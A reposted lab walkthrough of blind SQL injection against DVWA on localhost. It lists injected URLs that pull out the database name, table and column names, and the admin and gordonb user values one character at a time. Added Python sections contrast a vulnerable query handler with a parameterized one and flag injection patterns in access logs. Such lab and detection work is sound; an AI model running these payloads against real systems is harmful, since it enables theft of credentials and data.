
sql-injection-Blind-low-level-notes (SQL injection, DVWA lab)

2021-03-16 18:32:27  Views: 235  Source: Internet

Tags: Blind, users, level, notes, dvwa, Submit, ASCII, SELECT, schema


Blind injection
Guessing the length of the database name
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3' and LENGTH(DATABASE())=4 --+&Submit=Submit#
User ID exists in the database.
So database() has length 4.
Guessing the database name
SELECT ASCII('d');#100
SELECT ASCII('v');#118
SELECT ASCII('w');#119
SELECT ASCII('a');#97

SELECT SUBSTR(DATABASE(),1,1);#d
SELECT SUBSTR(DATABASE(),2,1);#v
SELECT SUBSTR(DATABASE(),3,1);#w
SELECT SUBSTR(DATABASE(),4,1);#a

SELECT ASCII('d')=100;#1
SELECT ASCII('v')=118;#1
SELECT ASCII('w')=119;#1
SELECT ASCII('a')=97;#1

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND ASCII(SUBSTR(DATABASE(),1,1))=99--+&Submit=Submit#
User ID is MISSING from the database.

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND ASCII(SUBSTR(DATABASE(),1,1))=100--+&Submit=Submit#
User ID exists in the database.

So the first character of database() is 'd'.
Likewise, the second character is 'v', the third 'w', and the fourth 'a'.
So the database name is database() = 'dvwa'.
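The two responses above ("User ID exists" / "User ID is MISSING") work as a one-bit oracle only because the low-level handler splices the id parameter straight into the SQL text. The following Python example is added here and is not code from the original post or from DVWA: it models that handler against an in-memory SQLite stand-in for the users table (constructed sample rows; SQLite's length/substr stand in for MySQL's, so DATABASE() is not available and the length probe from later in these notes is used instead) and places it beside a parameterized version. The function names, the fixture and the row contents are my assumptions.

```python
import sqlite3

EXISTS = "User ID exists in the database."
MISSING = "User ID is MISSING from the database."


def make_db():
    """Constructed fixture: a tiny stand-in for DVWA's users table (sample rows, not DVWA's data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, user TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?, ?)",
        [
            (1, "admin", "admin", "admin", "<hash-placeholder>"),
            (2, "Gordon", "Brown", "gordonb", "<hash-placeholder>"),
            (3, "Hack", "Me", "1337", "<hash-placeholder>"),
        ],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    # Models the low-level pattern: the raw request parameter is spliced into the query text,
    # so a quote in the parameter closes the string literal and the remainder is parsed as SQL.
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}';"
    rows = conn.execute(query).fetchall()
    return EXISTS if rows else MISSING


def lookup_fixed(conn, user_id):
    # Hardened form: the parameter is bound to a placeholder and is only ever compared as a
    # value; nothing inside it can change the WHERE clause, so there is no oracle to query.
    rows = conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()
    return EXISTS if rows else MISSING


# The length probe from these notes in SQLite form ("+" in the URL decodes to a space,
# which is what makes "--" a comment that swallows the handler's closing quote).
PROBE_TRUE = "3' AND length((SELECT user FROM users LIMIT 0,1))=5 -- "
PROBE_FALSE = "3' AND length((SELECT user FROM users LIMIT 0,1))=6 -- "


def compare_handlers():
    """Return {handler: (plain id, true probe, false probe)} so the contrast is visible."""
    conn = make_db()
    inputs = ("3", PROBE_TRUE, PROBE_FALSE)
    return {
        "vulnerable": tuple(lookup_vulnerable(conn, p) for p in inputs),
        "fixed": tuple(lookup_fixed(conn, p) for p in inputs),
    }


if __name__ == "__main__":
    for name, results in compare_handlers().items():
        print(name, results)
```

In the vulnerable handler the true probe returns the same text as a plain id of 3 and the false probe returns MISSING, which is exactly the signal the walkthrough reads one character at a time. In the fixed handler both probes are compared as a literal value, no row matches, and the response no longer depends on the truth of the injected condition. Binding parameters is the structural fix; rejecting non-numeric ids before the query is a cheap extra layer on top of it.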
Guessing the number of tables in the dvwa database
SELECT (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())=1;#0
SELECT (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())=2;#1
SELECT (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())=3;#0

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (SELECT (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())=2)--+&Submit=Submit#
#--> User ID exists in the database.
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (SELECT (SELECT COUNT(table_name) FROM information_schema.tables WHERE table_schema=DATABASE())=3)--+&Submit=Submit#
#--> User ID is MISSING from the database.
So the dvwa database contains 2 tables.
Guessing the first character of the first table name in the dvwa database
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE()LIMIT 0,1),1,1))=102)--+&Submit=Submit#
#--> User ID is MISSING from the database.
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE()LIMIT 0,1),1,1))=103)--+&Submit=Submit#
#--> User ID exists in the database.
The first character is g.
Likewise for the second character:
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE()LIMIT 0,1),2,1))=117)--+&Submit=Submit#
#--> User ID exists in the database.
The second character is u.
Continuing in the same way gives the table name guestbook; the second table is users.

Guessing the number of columns in the users table of the dvwa database
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND ((SELECT COUNT(column_name) FROM information_schema.columns WHERE table_name= 'users' AND TABLE_SCHEMA='dvwa')=8)--+&Submit=Submit#
#--> User ID exists in the database.
Result: the users table has 8 columns in total.
Guessing the column names of the users table in the dvwa database
#--> limit 6,1 selects the user column
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND(ASCII(SUBSTR((SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'dvwa' AND TABLE_NAME='users' LIMIT 6,1),1,1))=117)--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'dvwa' AND TABLE_NAME='users' LIMIT 6,1),2,1))=115)--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'dvwa' AND TABLE_NAME='users' LIMIT 6,1),3,1))=101)--+&Submit=Submit#
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND (ASCII(SUBSTR((SELECT COLUMN_NAME FROM information_schema.COLUMNS WHERE TABLE_SCHEMA = 'dvwa' AND TABLE_NAME='users' LIMIT 6,1),4,1))=114)--+&Submit=Submit#
#--> User ID exists in the database.
SELECT ASCII('u');#117
SELECT ASCII('s');#115
SELECT ASCII('e');#101
SELECT ASCII('r');#114

#--> This gives the users table's user column.
The same way gives the users table's password column.

Guessing the values of the user column in the users table
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=3'AND length(substr((select user from users limit 0,1),1))=5--+&Submit=Submit#
User ID exists in the database.
So the first value in the user column has length 5.

SELECT ASCII('a');#97
SELECT ASCII('d');#100
SELECT ASCII('m');#109
SELECT ASCII('i');#105
SELECT ASCII('n');#110
http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),1,1))=97))--+&Submit=Submit#
# First character of the first value: a

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),2,1))=100))--+&Submit=Submit#
# Second character of the first value: d

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),3,1))=109))--+&Submit=Submit#
# Third character of the first value: m

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),4,1))=105))--+&Submit=Submit#
# Fourth character of the first value: i

http://127.0.0.1/dvwa/vulnerabilities/sqli_blind/?id=2' and (SELECT (ASCII(SUBSTR((SELECT USER FROM users LIMIT 0,1),5,1))=110))--+&Submit=Submit#
# Fifth character of the first value: n

Combined: admin
Likewise, the second value of the user column (SELECT USER FROM users LIMIT 1,1) is obtained with further tries: Gordonb

As above, guess the values of the password column in the users table.
End.
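Seen from the defender's side, every step in these notes is one HTTP request whose only variable part is a character position or an ASCII value, so the enumeration leaves a long run of near-identical requests from one client carrying ASCII(SUBSTR(, information_schema and a comment tail. The following Python example is added here and is not from the original post: it performs a simple access-log triage by decoding each request URL, scoring it against indicator patterns taken from the probes above, and reporting clients that exceed a threshold of flagged requests. The log lines are constructed from this walkthrough's URLs in Apache combined-log form, and the regexes and thresholds are my own choices rather than any product's rules.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample lines (Apache combined-log shape) built from the probes in these notes;
# the last two are benign traffic to show that an ordinary "and" in a query string is not flagged.
LOG_LINES = [
    '127.0.0.1 - - [16/Mar/2021:18:32:27 +0800] "GET /dvwa/vulnerabilities/sqli_blind/?id=3%27+and+LENGTH(DATABASE())%3D4+--+&Submit=Submit HTTP/1.1" 200 4392',
    '127.0.0.1 - - [16/Mar/2021:18:32:41 +0800] "GET /dvwa/vulnerabilities/sqli_blind/?id=3%27AND+ASCII(SUBSTR(DATABASE(),1,1))%3D100--+&Submit=Submit HTTP/1.1" 200 4392',
    '127.0.0.1 - - [16/Mar/2021:18:33:05 +0800] "GET /dvwa/vulnerabilities/sqli_blind/?id=3%27AND+(SELECT+(SELECT+COUNT(table_name)+FROM+information_schema.tables+WHERE+table_schema%3DDATABASE())%3D2)--+&Submit=Submit HTTP/1.1" 200 4392',
    '10.0.0.5 - - [16/Mar/2021:18:33:10 +0800] "GET /dvwa/vulnerabilities/sqli_blind/?id=2&Submit=Submit HTTP/1.1" 200 4380',
    '10.0.0.5 - - [16/Mar/2021:18:33:12 +0800] "GET /search?q=cats+and+dogs HTTP/1.1" 200 1200',
]

# client, request path and status code from a combined-log line
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})')

# Indicators present in the probes above. Each is deliberately narrow; one hit on its own is weak
# evidence, so a request is flagged only when several co-occur.
INDICATORS = [
    ("quote-break", re.compile(r"'\s*(and|or)\b", re.I)),  # 3' AND ... / 3'AND ...
    ("boolean-probe", re.compile(r"\b(and|or)\b\s*\(?\s*(ascii|length|substr|substring)\s*\(", re.I)),
    ("schema-enum", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("comment-tail", re.compile(r"--\s|/\*")),  # "--+" in the URL decodes to "-- "
]


def classify(request_path):
    """Return the names of the indicators present in one decoded request path."""
    decoded = unquote_plus(request_path)  # %27 -> ', + -> space, %3D -> =
    return [name for name, rx in INDICATORS if rx.search(decoded)]


def analyze(log_lines, min_indicators=2, min_flagged=3):
    """Count flagged requests per client and return the clients at or above the threshold."""
    flagged = defaultdict(int)
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected log shape; skip rather than guess
        client, path = m.group(1), m.group(2)
        if len(classify(path)) >= min_indicators:
            flagged[client] += 1
    return {client: n for client, n in flagged.items() if n >= min_flagged}


if __name__ == "__main__":
    for line in LOG_LINES:
        print(classify(LOG_RE.match(line).group(2)), line[:60])
    print(analyze(LOG_LINES))
```

The per-client count matters more than any single match: a blind extraction of one five-character value needs at least five requests, and a full table walk needs hundreds, all with the same path and the same 200 status, which is why the response code alone is useless here and the volume of flagged requests per client is the signal worth alerting on.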

Source: https://www.cnblogs.com/codeace/p/14545148.html
